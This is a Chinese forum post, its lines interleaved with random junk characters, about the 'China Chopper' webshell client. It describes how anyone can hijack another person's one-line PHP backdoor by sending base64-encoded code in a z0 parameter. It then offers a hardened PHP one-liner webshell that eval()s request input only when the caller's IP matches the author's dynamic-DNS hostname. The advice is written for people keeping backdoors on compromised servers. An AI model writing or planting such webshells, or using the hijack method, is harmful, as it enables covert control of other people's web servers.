今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
4 N0 V" G E$ B; t9 O B/ L( G7 P9 K; ~% s, i3 t* j
就算你设置了密码,使用了eval($_REQUEST['moyo']); ^5 u! X) u$ j/ ]0 n& b
m- x( y& `4 {8 z( I+ e
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门: S& B4 {# ]- {. D% U
; M4 A9 N6 C/ p6 @1 r$ Q# e
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
0 \( Q9 W3 T# F( x& G3 P- E$ u: W! @, x+ z3 n o
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了* E8 d% e% o1 G; [) K4 D
! Z: _, G7 ~- m5 `) j, e9 M不知道是设计缺陷还是故意留的后门
% E7 \1 J& Y3 C" k% ^3 k: ~/ R6 V. w6 N5 j
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
, { Y' p' [7 ]$ i& D
" F6 K) ]: i! t2 c* n# R本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org% {# G6 A0 V/ x; q8 _& F* A
5 n2 e5 T- C; M8 S, \. w然后一句话后门这样写& P, J/ k! |$ D, Z7 F3 i
6 J; P! b* x9 ^6 Y
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
& R5 D! g* ?) n$ H这样就可以让一句话后门只允许自己的电脑连接了
4 u& M2 w: V% A: S( Y4 T
' s: {$ }6 c+ c7 c |